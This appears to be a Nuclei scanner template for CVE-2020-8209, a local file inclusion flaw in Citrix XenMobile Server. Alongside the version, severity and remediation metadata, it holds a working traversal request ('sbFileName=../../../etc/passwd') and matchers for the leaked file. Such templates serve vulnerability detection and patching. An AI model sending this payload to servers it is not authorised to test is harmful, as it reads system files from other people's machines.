id: CVE-2020-8209 info: name: Citrix XenMobile Server - Local File Inclusion author: dwisiswant0 severity: high description: | Citrix XenMobile Server 10.12 before RP2, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6, and Citrix XenMobile Server before 10.9 RP5 are susceptible to local file inclusion vulnerabilities. reference: - https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/ - https://support.citrix.com/article/CTX277457 - https://nvd.nist.gov/vuln/detail/CVE-2020-8209 remediation: | Apply the latest security patches or updates provided by Citrix to fix the vulnerability. reference: - https://support.citrix.com/article/CTX277457 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-8209 cwe-id: CWE-22 epss-score: 0.97075 epss-percentile: 0.99685 cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: citrix product: xenmobile_server tags: cve,cve2020,citrix,lfi,xenmobile http: - method: GET path: - "{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd" matchers-condition: and matchers: - type: word part: header words: - "fileDownload=true" - "application/octet-stream" - "attachment;" condition: and - type: regex part: body regex: - "root:.*:0:0:" # digest: 4b0a00483046022100ab66af8d4c83a23b78454d287d028ba69ac0304ef598a7292bd0a3aed0ec3c7b022100a6d8eacb3f1e563ed11b2c2d0aecf6a39d0e0a53695a02a25e4828c51259321c:922c64590222798bb761d5b6d8e72950